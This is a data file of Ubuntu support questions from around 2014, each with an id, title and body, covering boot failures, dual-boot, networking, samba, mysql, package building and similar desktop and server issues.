472730	ubuntu 12.04 slow boot on asus , attached with dmesg and bootchart	i heard that ubuntu can boot up around 30sec , but i take more than 60sec every time my ubuntu boot . i also read some forum said need to post the dmesg and bootchart to identify which process slowing down the booting time , as i 'm not expert in ubuntu and wish to learn more about it , i humbly ask any pro here to teach me how . my laptop specs : model : asus k45vs ram : 8mb cpu : intel ( r ) core ( tm ) i7-3630qm cpu @ 2.40ghz x 8 graphic card : nvidia geforce gt 645m hdd : 750gb os : single boot ubuntu 12.04lts system.uname : linux 3.8.0-39-generic # 58~precise1-ubuntu smp fri may 2 21:33:40 utc 2014 x86_64 system.release : ubuntu 12.04.4 lts system.kernel.options : boot_image=/boot/vmlinuz-3.8.0-39-generic root=uuid=c8a71503-bce8-406c-9a5f-5aa8284f5c7c ro quiet splash my dmesg ( which highlighted to the huge time frame gap ) : [ 30.772656 ] cgroup : libvirtd ( 1961 ) created nested cgroup for controller `` memory '' which has incomplete hierarchy support . nested cgroups may change behavior in the future . [ 30.772659 ] cgroup : `` memory '' requires setting use_hierarchy to 1 on the root . [ 30.772683 ] cgroup : libvirtd ( 1961 ) created nested cgroup for controller `` devices '' which has incomplete hierarchy support . nested cgroups may change behavior in the future . [ 30.772710 ] cgroup : libvirtd ( 1961 ) created nested cgroup for controller `` blkio '' which has incomplete hierarchy support . nested cgroups may change behavior in the future . [ 32.140335 ] nvidia 0000:01:00.0 : irq 46 for msi/msi-x [ 32.505619 ] acpi error : field [ tmpb ] at 1081344 exceeds buffer [ rom1 ] size 262144 ( bits ) ( 20121018/dsopcode-236 ) [ 32.505624 ] acpi error : method parse/execution failed [ \_sb_.pci0.peg0.pegp._rom ] ( node ffff880224e91f00 ) , ae_aml_buffer_limit ( 20121018/psparse-537 ) [ 802.034422 ] audit_printk_skb : 69 callbacks suppressed [ 802.034428 ] type=1400 audit ( 1400914804.392:35 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=1683 comm= '' cupsd '' pid=1683 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 1581.300901 ] type=1400 audit ( 1400915584.816:36 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=1683 comm= '' cupsd '' pid=1683 comm= '' cupsd '' capability=36 capname= '' block_suspend '' my bootchart.png : looking forward to learn to improve both my booting time and knowledge . thanks in advance : )
472732	sudo wo n't accept my password even with caps lock off and the right password	first , i just want to say that i did check for caps lock and i know for a fact that it was the correct password and everything was fully correct . i even entered the sudo command a second time and double-checked that it was not misspelled or anything prior to pressing enter . also , i made sure all other programme windows were closed . it still did n't work . why ? nothing changed , for only a few seconds ago i was doing the exact same command and it worked perfectly . why now ? what 's going on ? specs : computer model : hp chromebook 11 booting method : croot via crouton crooted os : xubuntu 12.04.4
472733	set specific interface for internet access	i have a machine with three network interfaces running ubuntu 12.04 lts , 64-bit , kernel 3.5.0-49 . i am using all three interfaces . two of them are connected to lans ( eth0 and eth1 ) and one is connected to the internet ( eth2 ) ; but when i try to access the internet , it attempts to go through eth0 ( error responses come from eth0 's ip ) . i know that it will work ( from experience elsewhere ) if i do n't set a gateway address for eth0 or eth1 , but i have to because for some reason the network manager gui wo n't let me save connection settings if no gateway is specified ( ? ) . how do i either a ) set eth0 and eth1 to not have gateway addresses , or b ) tell the system to use eth2 for internet access ( that is , ips not on eth0/eth1 's subnets , and dns lookups , i guess ) . as for trying to unset eth0 and eth1 's gateway addresses : trying to bypass the network manager gui , i checked in /etc/network/interfaces but ubuntu does n't seem to use it ( it only has an entry for lo ) . i 'm not really familiar with more modern ways of configuring interfaces though , and so i gave up there .
472737	installed ubuntu 14.04 but boot fails after hard reset	i installed windows 7 first then partitioned 30gb inâ ext4 and installed ubuntu 64bit and it asked for reboot . i unplugged usb stick installer and hold on a while . it did n't reboot so i power off and booted . it defaultly went to ubuntu login screen and did not show dual boot option . any suggestion would be great.. is that i need to reformat my is of linux or any workaround .
472742	remote ubuntu installation	is it possible to install ubuntu on a remote server ? i had to move to where my server is situated to install ubuntu last night , which thing is not very funny .
472745	test booting ubuntu 13.10 after oem install then shut down ubuntu safely	i am looking for a way to complete the oem install of ubuntu , then boot it up to ensure it boots to the users first run setup screen ( where they enter their personal information ) . however i then want to shut it down safely and box it up . i want to be sure that when the user boots it up again , it will still run through the first time setup screens . during those first time setup screens , there is no clickable button to safely shut it down ( power off ) without answering those questions . any idea anyone ?
472746	why is i-bus pinyin ( chinese ) always active , even in english & spanish keyboard layouts ?	i am having some issues with i-bus pinyin input for chinese . it seems like there are two related problems . basically , pinyin input is either always on or always off and i 'm not able to change input methods correctly using the keyboard . secondly , i can only change input methods more or less properly by using the mouse and clicking the input method icon in the menu bar and then clicking the input method i want . using the text entry settings 'switch to next input method ' keyboard setting ( ctrl+space ) will change the icon shown in the menu bar , but pinyin will not come on when pinyin is shown there . conversely , if pinyin is on , it wo n't turn off when other layouts are selected ( i have english listed first , then pinyin , then spanish ) .
472747	booting windows after installing linux	i have a lenovo ideapad s510p . first i installed windows 8 on it . then ubuntu 14.04 . but after installing ubuntu , i ca n't boot windows 8 . i installed grub2 but i do n't know how to configure it . what should i do ? thanks
472750	rexec and remsh configuration on ubuntu 14.04 server	can someone help me to configure the rexec and remsh services on ubuntu 14.04 server . even though i have installed the rsh-server package on the server , only rsh and rlogin working fine . but rexec and remsh not working at all . thanks for your help in advance .
472751	not sure how to save ubuntu on a cd-rom ~ can you assist , please ?	downloaded , but can not retrieve . it downloaded it with magic iso . i do n't want to buy magic iso just to download ubuntu . can i re-download ubunto to a dvd , and how do i do that ? or can i use nero software to save ubuntu to dvd ?
472758	where do you guys get the ppa 's for installing new software	whenever i want to download and install new software on my computer i have to go onto google and type `` how to install etc etc '' i 'm just curious how you guys know the ppa 's . where do you get them ?
472759	system settings and software center disapeared	this is my 1st time to try a linux desktop on ubuntu 14.04 with a hope to have a stable and usable version of linux . it worked well at the beginning with some popular applications at the first day . however , for unknown reason , ( maybe after installing dropbox or after a system update ) , the software center was disappeared and all software installed via software center were gone together . system settings cannnot be launched . then i tried this command : sudo apt-get install -- reinstall gnome-control-center so system settings can be opened again but most items in system setting are not displaying . there are only 4 items there including printer , security and privacy , language , and software & update . all others are not there . when i click about this computer , instead of displaying computer info , it displays system settings now . so what 's going on with this ? it 's so frustrated . btw , i am an experienced windows user and could n't understand why the core components are disappeared in ubuntu . can you image that control panel is disappeared in windows ? in windows , i can try system restore or safe mode . it seems i do n't have options to try in ubuntu . see photo here https : //lh4.googleusercontent.com/-phwae27qsey/u4qoborcmki/aaaaaaaamaa/od1nwv0kqa4/w1212-h682-no/screenshot+from+2014-05-26+22 % 253a06 % 253a07.png
472760	error running c program compiled with geany ide error code : 127	i installed geany ide via ubuntu software center . wrote a hello world prog in c and it compiled successfully but when i tried to run it , it gave me this error : ./geany_run_script.sh : 5 : ./geany_run_script.sh : ./hello : not found -- -- -- -- -- -- -- -- -- ( program exited with code : 127 ) press return to continue could someone please tell me what i should do ?
472761	only able to connect via ethernet . wifi is n't even an option	i have looked through the community but being new gives me a disadvantage ... i have ubuntu 14.04lts installed on a dell latitude d830 i went to software updates and enabled the broadcom driver also enabled the nvidia driver that was a proprietary driver i can connect via the ethernet cable , but i have no sign of it detecting anything wireless . i do n't have a switch to cut wifi on/off on this laptop . i have reset both the modem and router . i looked on here and found a few threads talking about `` soft blocked '' and other options . i followed them in the terminal but had no success . any help is appreciated . if you need more information please let me know what to do next . vinny @ vinnys-pc : ~ $ lspci -nn | grep 0280 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] ( rev 01 )
472762	apt-get source code getting failed	i tried to install source code for unity using apt-get source unity . i get the following result in the terminal . reading package lists ... done building dependency tree reading state information ... done notice : 'unity ' packaging is maintained in the 'bzr ' version control system at : https : //code.launchpad.net/~ubuntu-desktop/unity/precise please use : bzr branch https : //code.launchpad.net/~ubuntu-desktop/unity/precise to retrieve the latest ( possibly unreleased ) updates to the package . need to get 1,375 kb of source archives . err http : //ubuntu.excellmedia.net/archive/ precise-updates/main unity 5.20.0-0ubuntu3 ( dsc ) 403 forbidden err http : //ubuntu.excellmedia.net/archive/ precise-updates/main unity 5.20.0-0ubuntu3 ( tar ) 403 forbidden err http : //ubuntu.excellmedia.net/archive/ precise-updates/main unity 5.20.0-0ubuntu3 ( diff ) 403 forbidden failed to fetch http : //ubuntu.excellmedia.net/archive/pool/main/u/unity/unity_5.20.0-0ubuntu3.dsc 403 forbidden failed to fetch http : //ubuntu.excellmedia.net/archive/pool/main/u/unity/unity_5.20.0.orig.tar.gz 403 forbidden failed to fetch http : //ubuntu.excellmedia.net/archive/pool/main/u/unity/unity_5.20.0-0ubuntu3.diff.gz 403 forbidden e : failed to fetch some archives . what should be done to prevent the problem ?
472765	ca n't boot into ubuntu after windows 7 install	ok so i have multiple problems ... i installed windows 7 on a separate partition from ubuntu and i knew it was gon na overwrite grub so after the install i downloaded easybcd . here 's the problem with easybcd : it does n't recognize the ubuntu partition okay , so i reboot and put in the ubuntu live cd and try that but it just gives me a blinking line in the top-left corner and then boots into windows . i try to use usb and it says bootmgr is missing so now i 'm stuck with windows and i cant boot into ubuntu i tried booting ubuntu live cd , supergrub2 , plop boot manager , and rescueatux from cd and usb but as i stated earlier that did n't work is there any way to recover grub2 from within windows or any hope at all for me ... also my computer is hp touchsmart 300 and i installed windows 7 ultimate x64 from a usb
472773	desktop calendar to keep news and updates	need to keep my tasks , events , to-do and especially keep that days latest news in the corresponding date . please suggest me a good one .
472777	alias multi commands as one alias	i made an alias for youtube-dl with some options like that yd= '' youtube-dl -cit -f 18 '' so i can download it like yd url i want to modify it to show only the two lines from the output using grep -e `` downloading video # '' -e eta i can make it in two aliases using the | but is there a way to make it one alias
472782	what 's the difference if i use windows 7 as a standard user vs if i use ubuntu ?	ubuntu is secure for various reasons , one of them , a major one i believe , is that when you try to install a software/app via terminal/store an authentication box pops up asking you for your password . i 'm a long-term windows user , unfortunately , and there are 3 types of user accounts in windows ; administrator , standard user and guest . if i use the standard user account to do my tasks in windows 7 then every time i need to install a software an authentication box will pop up asking me for my administrator password , similar to ubuntu somehow and a security plus for windows . since both ask for a password then what 's the difference if i use windows 7 as a standard user vs if i use ubuntu ?
472784	configure truecrypt to work seamlessly	ok , this question shows how to install truecrypt on linux . but how to configure it correctly in ubuntu 14.04 , so it works fine : a normal user should be able to mount a truecrypt volume without the need to enter an administrator 's password , his own password should be sufficient make the by default created icon ( /usr/share/applications/truecrypt ) work ( by default the gui launches , but one gets `` permission denied '' errors even when just exiting ; prepending `` pkexec '' the command in the exec line does not help ) currently , i have to execute sudo truecrypt in a terminal . after mounting this opens the volume in a new `` files '' window ( though the according truecrypt option is unselected ) which i always have to close . if you make the error to click the exit button , truecrypt keeps running but without any window . then you have to open another terminal and run sudo truecrypt again .
472789	gparted shows wrong used space ?	i have an ubuntu 14.04 installation and need to change the file system of one of my drives . i need to copy all its data to another drive then copy it back after having changed the file system but i have run into a bit of a problem . gparted reports 600gb being used but if i open the mount drive in nautilus , the only folder i can see is 24 gb ( there are no hidden folders besides .trash and lost+found ) . how can i be sure that all that there is on that drive ( single ext4 partition ) is what i see on nautilus and that there is n't anything else ? the partition is /dev/.sdc1 and it is mounted to /mnt/hdd1 ... i tried checking the partition and resizing it with gparted but it still shows the 600gb being used . any ideas ? lsblk returns the following : name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk └─sda1 8:1 0 465.8g 0 part /mnt/hd500gb1 sdb 8:16 0 465.8g 0 disk └─sdb1 8:17 0 465.8g 0 part /mnt/hd500gb2 sdc 8:32 0 1.8t 0 disk └─sdc1 8:33 0 1.8t 0 part /mnt/bi-tera2 sdd 8:48 0 1.8t 0 disk └─sdd1 8:49 0 1.8t 0 part /mnt/bi-tera1 sde 8:64 0 298.1g 0 disk ├─sde1 8:65 0 294.2g 0 part / ├─sde2 8:66 0 1k 0 part └─sde5 8:69 0 4g 0 part
472790	access mounted network share	when accessing a windows network share using the `` files '' application on ubuntu 14.04 using its `` file | connect to server '' menu item , where is the network share mounted in the file system ( i want to use it from the midnight commander ) ? the ~/.gvfs mentioned in the answer to this question is not accessible .
472791	how to reset/flush remove ufw rules in recovery mode in ubuntu 12.04	hello i think i have mistakenly locked myself from a remote server ( ssh ) . i had a way to restart in recovery mode but it seems ufw is not even installed when in recovery mode . should i follow serverfault post about using purely iptables script to be run at boot time ? i have no ufw folder under /etc/default nor under /etc/ best regards ,
472792	desktop is non existent on ubuntu 14.04 ?	i have an issue where the `` ubuntu 14.04 lts '' label stays on the screen after logging in , the desktop icons are missing , and even right-clicking on the desktop yields no result , leaving the desktop essentially non existent . the icons and files show up just fine on nautilus , but i do n't have a desktop as such . here is what my desktop looks like : i noticed this problem after installing gnome on ubuntu 14.04 , yet it still persists after removing gnome from the system . i went though a few forums , tried removing gnome , reinstalling ubuntu desktop and unity but to no avail . i ran the following commands , as instructed : sudo apt-get update sudo apt-get remove sudo apt-get purge gnome-shell-* sudo apt-get remove ubuntu-desktop sudo apt-get remove unity sudo apt-get install ubuntu-desktop sudo apt-get install unity any clues as to what might be causing this ? ( i tagged desktop-environment as there was no relevant tags related to desktops . apologies for any inconvenience caused . )
472794	hostapd error `` nl80211 : could not configure driver mode ''	i would like to make a virtual router on ubuntu 12.04 but i am getting this error message when i run the last terminal command configuration file : hostapd.conf nl80211 : could not configure driver mode nl80211 driver initialization failed . hostapd_free_hapd_data : interface wlan0 was n't started
472795	how can i get new /etc/samba folder ?	i have manually removed /etc/samba folder , hoping that reinstalling samba would create a fresh one so i could have new smb.conf file with default settings . is there a way to restore this folder or get a fresh one ?
472798	can not rename files when saving	i am using xubuntu 13.10 . since the last update , when i am saving files i can not rename other files , there are missing buttons in context menu like rename , cut , copy , etc ... let`s say i edited the file named style.css in firefox , and i want to save it , but i do not want to overwrite the original , i want to rename the original for ex : style_orig.css and save the edited file with the name style.css . for doing that i must open thunar , navigate to that file , and rename it , after that , i can save the file from firefox . let`s reformulate this question : if i want to overwrite a file , but preserve the original , then i must make a copy of the original . well , i can not do this when saving the file from the application , i must open thunar and navigate to that file which is an additional task i have to do . it`s a waste of time .
472799	dpkg : warning : files list file for package 'linux-generic ' missing ; assuming package has no files currently installed	every time i want to install something with terminal it shows this warning message but it continue to install , what 's the problem ? dpkg : warning : files list file for package 'linux-generic ' missing ; assuming package has no files currently installed
472800	how to set bashrc shell environment	i would like to add _env to my bash so once i ssh to the server it shows something like this : [ live ] [ root @ server ~ ] # or [ dev ] [ root @ server ~ ] # how can i do this ? i have been looking everywhere for this but without any luck . thank you !
472802	what types are allows in config.yaml in juju charms ?	the `` config.yaml '' settings inside juju charms contain a type - e.g . : pip_no_index : default : false type : boolean description : `` prevent pip connecting to python package index to download packages '' this type defaults to string if not provided . the only ones i 've seen in existing charms are : string boolean int is it possible to have other types ? specifically , list or dictionary ? is there a list of charm config types anywhere ?
472808	why cant apt-get install the i386 version of any package ?	why cant apt-get install the i386 version of libpcap-dev ? $ sudo apt-get install libpcap-dev : i386 reading package lists ... done building dependency tree reading state information ... done package libpcap-dev : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libpcap-dev : i386 ' has no installation candidate however , the package clearly exists : https : //launchpad.net/ubuntu/trusty/i386/libpcap-dev . i 'm on ubuntu 14.04 x64 .
472811	unable to login as root after mysql service restart	i installed mysql on ubuntu 14.04 lts like : sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql after completely removing mysql with : sudo apt-get remove -- purge mysql-server mysql-client mysql-common sudo apt-get autoremove sudo apt-get autoclean sudo deluser mysql sudo rm -rf /var/lib/mysql everything works fine until i restart the mysql service with : sudo service mysql restart then i can no longer login with the root user and password . i get the error access denied for root @ localhost using password yes my only guess : is it possible there are two instances of mysql installed ? edit all of the below are set as installfrom the output of : dpkg -- get-selections | grep -v deinstall | grep `` mysql '' libapache2-mod-auth-mysql libdbd-mysql-perl libmysqlclient18 : amd64 libmysqlcppconn7 mysql-client-5.5 mysql-client-core-5.5 mysql-common mysql-server mysql-server-5.5 mysql-server-core-5.5 mysql-utilities mysql-workbench mysql-workbench-data php5-mysql python-mysql.connector
472812	why is 777 assigned to chmod to permit everything on a file ?	i was asked in an interview why it is that 777 is assigned to take all permissions for a file . why not 555 ? he said that there is reason for everything . so , what is the reason for 777 ? why not any other number ? is there any significance in this number ?
472814	struggling to get 14.04 to boot alongside windows 8 on separate ssd with uefi	as the title says i 've been struggling to get 14.04 to boot on my machine , the install worked after editing grub to use nomodeset but it refuses to move past a black screen on the next boot . current system is : i7 4770k @ 4.3ghz msi z87 g45 8gb ram 3x120gb ocz ssd in raid0 1x120gb ocz ssd nvidia 780 windows 8 is installed on the raid array , which is on the z87 intel controller . all setup and running under uefi settings ( gpt partitions , windows 8 features enabled in bios , secure boot disabled , msi fastboot enabled ) . now i want to install 14.04 on the single 120gb ssd and keep it separate from the windows install , i do n't want eithers boot menu to mention the other os as i 'll manually boot from this drive when i want to use 14.04 . however i seem to be hitting some problems mainly not being able to pass a black screen when booting from the drive , i 've read some other threads and it suggested using boot-tool but all of these seemed aim at dual-boot setups . i 'm thinking best bet will be to unplug the raid array , install 14.04 on the drive alone then reinstall the raid array and leave it be . thoughts ? from what i 've ready uefi and especially secure boot are a bit troublesome for *nix
472821	samba : change primary group for domain user mapped with winbind	i use the setup that utilize mixture of local and domain accounts . local accounts : for domain users that poses local user on unix box i use static user map file . these users are mapped correctly . local uid and gid are in use as expected . domain accounts : for domain users with no local user account the winbind is used . winbind translates primary group rid and user rid correctly in accordance to rid backend in use for winbind idmap . now i 'd like to change the primary group for domain ( winbind ) users which is `` domain users '' to one that local users use . by any chance is it even possible ? one walk-around i can think of is to set sgid on share but i do n't like it as this is something i 'd have to apply to multiple directories ( homes etc . and is not really flexible ) to make sure the access level between local and domain users is provided . example : root @ myserver # cat /etc/group | grep localuser locprimary : :3000 : localuser dusr : :3003 : localuser root @ myserver # net groupmap list domain users ( s-1-5-21-x-y-z-513 ) - > dusr users ( s-1-5-32-545 ) - > builtin/users domgroup ( s-1-5-21-x-y-z-1159 ) - > locprimary root @ myserver # groups localuser domainuser localuser : locprimary dusr dusr builtin/users domainuser : dusr locprimary builtin/users but i 'd like to have : domainuser : locprimary dusr builtin/users
472822	problem installing mspgcc binutils	when am trying to install mspgcc on ubuntu 14.04 version am getting an error at `` make '' during installation of binutils ... following are the commands i used.. wget http : //ftpmirror.gnu.org/binutils/binutils-2.21.1a.tar.bz2 tar xvfj binutils-2.21.1a.tar.bz2 cd binutils-2.21.1 patch -p1 < ../mspgcc-20120406/msp430-binutils-2.21.1a-20120406.patch cd .. mkdir -p build/binutils cd build/binutils ../../binutils-2.21.1/configure -- target=msp430 -- program-prefix= '' msp430- '' -- with-mpfr-include=/usr/local/include -with-mpfr-lib=/usr/local/lib -- with-gmp-include=/usr/local/include -with-gmp-lib=/usr/local/lib -- with-mpc-include=/usr/local/include -with-mpc-lib=/usr/local/lib make -j 4 sudo make install cd ../..
472824	openvpn is working but no internet connection	i 'm using an openvpn connection in ubuntu , it 's working well but when i 'm using it , my internet connection is not working . i edited my connections in network manager , i 've been to the vpn tab , and edited the vpn configuration . in the ipv4 settings tab , i clicked in the bottom right button `` routes '' and i ticked `` use this connection only for resources on its network '' . when i 'm doing this the internet access is working but the vpn is not any help please ?
472826	deb package building	while trying to build a package , i gave the following command in terminal : cd downloads/src/ cd unity-5.10.0/ dpkg-buildpackage -rfakeroot -uc -b then it gives the output : dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : -d_fortify_source=2 dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions -wl , -z , relro dpkg-buildpackage : source package unity dpkg-buildpackage : source version 5.10.0-0ubuntu6 dpkg-buildpackage : source changed by didier roche < didrocks @ ubuntu.com > dpkg-buildpackage : host architecture i386 dpkg-source -- before-build unity-5.10.0 dpkg-checkbuilddeps : unmet build dependencies : libutouch-grail-dev ( > = 1.0.20 ) libutouch-geis-dev ( > = 2.0.10 ) dpkg-buildpackage : warning : build dependencies/conflicts unsatisfied ; aborting . dpkg-buildpackage : warning : ( use -d flag to override . ) then i tried to install the package using : cd.. sudo dpkg -i *deb and it gives : [ sudo ] password for harshnarang8 : dpkg : error processing *deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : *deb what is exactly causing the problem and how to encounter it ?
472828	uninstall ubuntu	so recently i downloaded the most recent ubuntu iso for installation alongside my windows 8.1 . everything went really smoothly with no errors or hiccups during installation . the only thing is i 've decided that i just wan na go back to using windows 8.1 . i have n't a clue how to uninstall ubuntu now . i was going to use the windows installer but there was n't one available , however fund this latest iso which provided a much improved installer which as i said made things go a lot better . has anyone any idea how to uninstall it as i tried the dvd i burnt the iso to and all it gives me the option of is reinstalling ubuntu , there is no option to uninstall once i 've installed . any ideas anyone ?
472829	how to open multi terminal on ubuntu server ?	i have installed ubuntu 12.04 lts server . how can i run more than .sh file in the same time ( opening more than terminal ) i can use it on desktop version but i use server version . is it possible ? if yes how can do ?
472831	how to access terminals with their names through c program ?	how to access a terminal through its name in c program ? i can only access the current terminal in which i am running the program through system ( ) function . i want to access multiple terminals through one program using the name of the terminal .
472834	where does node.js install to ?	i 'm trying to install a script , which is a clone of a game , and uses node.js for it . now , the documentation says i should copy the node.exe ( windows ) and put it where the clone is . now , i ca n't find the node.exe ubuntu equivalent , i ca n't even find where it 's installed ? ! do n't really want this hosted on a windows machine due to licensing . here 's a snipet from the doc : download : node.js ( install button ) go where you are install node.js ( for windows 8 it 's c : /programms/nodejs ) copy node.exe and paste on the clone folder now i need to do this in ubuntu , however i ca n't find where node is installed to ? any ideas ?
472835	installation error in virtualbox	i have an error when i try to install both 32-bit lubuntu and ubuntu 14.04 . i 'm not sure what this means , but the install process seems to get stuck there and does n't continue . i 've waited for upwards of half an hour for it to proceed . i 'm running a fresh install of virtualbox on windows 7 with a 64-bit processor . not sure what 's going on .
472840	aticonfig detects all graphics cards , but amdcccle shows the cards as disabled	i been having the strangest problem since few days ago . i have 3 ati graphics cards and the aticonfig -- list-adapter shows the following output * 0 . 01:00.0 amd radeon hd 7900 series 1 . 02:00.0 amd radeon hd 7900 series 2 . 05:00.0 amd radeon hd 7900 series when i do aticonfig -- adapter=all -- initial -f it generates the correct x config also . but after rebooting the output only show on primary monitor and when i look in amdcccle it shows the other 2 adapters as disabled . i tried with monitors attached and dummy plugs both but the situation does n't change . any idea whats causing this ? also right clicking and making the adapter enabled in amdcccle and saving changes causes the x config to only have the adapter section and no screen section . after reboot the situation stays the same . also if i look in the x.log i see the fglrx was only loaded by the first device , it does not show any error or failing on the other two devices .
472849	destroy a juju service and also its associated machine	i 'm looking for a way to automatically destroy the associated machine after destroying a service with : juju destroy-service [ service_name ] i know i can do : juju destroy-machine -- force [ machine_number ] but this ca n't easily be automated with a script , as the script does n't know the number of the machine . is there a way either to : have destroy-service also take the machine with it , or get the machine number of my [ service_name ] with a simple bash command , to pass to destroy-machine
472850	brightness control in ubuntu 14.04 on sony vaio ?	i recently installed ubuntu 14.04 lts on my sony vaio [ nvidia geforce 410m/pcie/sse2 ] . earlier i had 12.04 installed on it , then i edited the xorg.conf file to control brightness using the function keys . but now the file is empty and even if i created it like last time it ai n't working . i tried the xbacklight too , it did n't worked . please help ... . thanks edit : ubuntu installed is 64bit version .
472851	wine 1.6.2 sound not working	i 'm using an ubuntu 14.04 and a wine 1.6.2 . i successfully installed and ran gta iii from it and it works , except that there is no audio . i changed the setting from `` speaker '' to `` headphone '' ( what i use ) and even tried changing the in-game hardware options . it should be noted that i have never used wine before this so it would most probably be a problem regarding wine .
472853	how to fix `` warning : 0xee partition does n't start on sector 1 . this can cause problems in some oses . ''	i was running fixparts to delete the stray gpt data . i got the following message warning : 0xee partition does n't start on sector 1 . this can cause problems in some oses . how do i fix this ? i have wiped the stray gpt data , however when i try to install ubuntu , it still says that the installer does not recognize any existing os , but i actually have win 7 installed . if i chose to 'do something else ' and proceed , i am able to see the existing partitions of my hard disk unlike before using fixparts when the whole hard disk was considered allocated . i am afraid if i proceed the installations , the grub might not show the option to load win 7 . please help !
472854	tkinter not working	i recently installed python and idle from synaptic . however , when i test tkinter i get the following error : import tkinter tkinter._test ( ) traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/lib/python2.7/lib-tk/tkinter.py '' , line 3790 , in _test root = tk ( ) file `` /usr/lib/python2.7/lib-tk/tkinter.py '' , line 1767 , in __init__ self.tk = _tkinter.create ( screenname , basename , classname , interactive , wantobjects , usetk , sync , use ) _tkinter.tclerror : ca n't find a usable tk.tcl in the following directories : /usr/local/src/tcl8.6.1/library/tk8.6 /usr/local/src/tcl8.6.1/tk8.6 /usr/lib/tk8.6 /usr/local/lib/tk8.6 /lib/tk8.6 /usr/library this probably means that tk was n't installed properly . however , i have installed tk using the following command : sudo apt-get install tk8.6 tk-dev i have no idea what is going on . in order to install the module environment i have compiled tcl8.6.1 from source in /usr/local/src/tcl8.6.1 . could that be the problem ? thank you best , tom
472856	unable to access windows share from an ubuntu desktop	can anyone tell me how to access a folder which is shared on a windows server ? the windows server is a dc ( domain controller ) . i can browse up to the folder & once i double click on the share name , it asks for a username , password , domain but does not log in . any idea why ? or should i ask this on a windows forum ?
472857	what is openstack and is it like citrix xenserver ?	at home i use citrix xenserver running on a home pc to host virtual machines . it 's pretty good , except the management tools ( xencenter ) only run on windows . so i have to keep and xp netbook about to do management . every time i get a new ubuntu server iso i see that it comes with something called openstack . does this mean i could replace citrix xenserver with an openstack based system ? here are the key features i use : booting vms off of iscsi hosted on a synology nas snapshotting vm disks before upgrades to do roll backs cloning vms off of those snapshots overprovisioning ram ( each vm thinks it has it 's own 3gb of ram , but it all comes from a shared pool ) pci express passthrough of devices from host to vm ( tv tuners at the moment ) resource monitoring of the host and vms ( cpu , ram , hdd , net ) send restart and shutdown requests to the vms without using the command line create single file backups of vms including metadata . all of those things i can do with the gui ( except 5 , pci passthrough requires manual hacking of the vm host file ) can i do all that with openstack ? does it have a web interface instead of a fat client ? i once tried hosting my vms on ubuntu server with kvm and some sort of vm management tool from the software centre . it was awful . this is n't that is it ? or maybe it 's a lot better now . ( that was back in 2010 or 2011 i think )
472861	how to change the user agent in gnome web ( epiphany )	i was trying to change the user agent in gnome web 3.12 but i ca n't find any good tutorial on how to do his . i want to set it to the google chrome 's ua , so it is n't detected as `` safari on linux '' , and some pages load like in chrome ( google.com for example ) . some sites say it 's through dconf but there 's no /apps/empathy key . the branding.conf file says user agent in the header but there 's no ua string set . any help would be appreciated . thanks .
472866	difference between backup and import bookmatks in firefox	main usage of backup/restore and import/export in firefox . difference between both of them in functionality wise .
472867	windows boot manager blocked by current security policy for lenovo u-510	i have got a lenovo u-510 with pre-installed windows 8 , and i want to have ubuntu installed in parallel . i installed ubuntu 12.04 , and after that i did grub repair through online support , since my system was booting directly to windows . after the grub repair was performed , the real problem started for me windows boot manager has been blocked by current security policy can anyone help me in sorting this issue out , apart from giving me the suggestion to use a recovery device ?
472868	mod_lua is missing in 14.04 ?	apache is 2.4.7 in the new 14.04 release . various website and release notes mention that lua via mod_lua became available . there is a lua.load file in /etc/apache2/mods-available , but the corresponding module , mod_lua.so is not present in /usr/lib/apache2/modules . there is not libapache2-mod-lua to be found in apt . my question is : how is mod_lua installed ? thanks !
472870	can not install ubuntu in qemu ... partition problem ?	i am trying to install ubuntu 13.04 lts server to qemu image file . first , i created qcow image qemu-img create -f qcow2 ubuntu.img 10g and executed qemu with ubuntu server iso image . qemu-system-x86_64 -k en-us -cdrom ubuntu-13.04-server-amd64.iso -hda ubuntu.img -boot d while installing , in partition disks , the space of hda was 197.1kb which originally 10g . what am i supposed to do ?
472871	problem installing ubuntu 14.04	i want to install ubuntu 14.04 on a system with windows 8 already installed . i do not get the option of `` install beside windows '' . it shows that all of my drive is free space and unpartitioned whereas in disk application i can see my partitions . sudo fdisk -l result : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xd087a632 device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 409602047 204441600 7 hpfs/ntfs/exfat /dev/sda3 409602048 1748721663 669559808 7 hpfs/ntfs/exfat disk /dev/sdb : 8054 mb , 8054112256 bytes 256 heads , 29 sectors/track , 2118 cylinders , total 15730688 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 4184 15730687 7863252 c w95 fat32 ( lba )
472872	ubuntu mount points for new installation ssd and secondary hdd	i have a question regarding a new ubuntu installation . i have a primary ssd drive and secondary hdd drive . i am going to put home on the secondary drive and have done this with multiple installations . however over time with the number of applications i install the primary disk fills up . what other locations should i put on the secondary drive ? /usr ? /var ?
